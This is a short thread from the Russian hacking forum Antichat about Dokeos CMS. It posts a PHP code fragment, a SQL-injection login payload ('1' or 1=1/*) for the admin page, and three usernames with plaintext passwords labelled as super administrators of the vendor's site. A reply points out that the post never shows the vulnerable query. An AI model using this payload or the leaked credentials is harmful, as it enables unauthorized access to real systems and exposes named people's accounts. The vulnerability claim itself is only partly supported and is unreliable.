Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- Сценарии/CMF/СMS (https://forum.antichat.xyz/forumdisplay.php?f=114)

- - Dokeos CMS (https://forum.antichat.xyz/showthread.php?t=76027)

Dokeos CMS

Warning: magic_quotes_gpc = off
--------------------------------------
Site: dokeos.com [PR=6]
Status: Free
--------------------------------------
Vuln:
/claro_init_local.inc.php

PHP код:


		
			
 ............

   if(isset($_POST['login']) && isset($_POST['password'])) // $login && $password are given to log in

    {

        $login = $_POST['login'];

        $password = $_POST['password'];

 .............

--------------------------------------
Exploit:
/admin/login.php

PHP код:


		
			
Your login : 1' or 1=1/*    

 Your password : x3kpass

--------------------------------------
Super Administrators:

Код:

yannick:adminPassword

 thomas:upsi24lon

 jwarnier:cisco123

ZAMUT (c)

Подверженная версия, дорк и уязвимый запрос пожалста (ты указал только объявление переменных, но не показал где и как они попадают в запрос).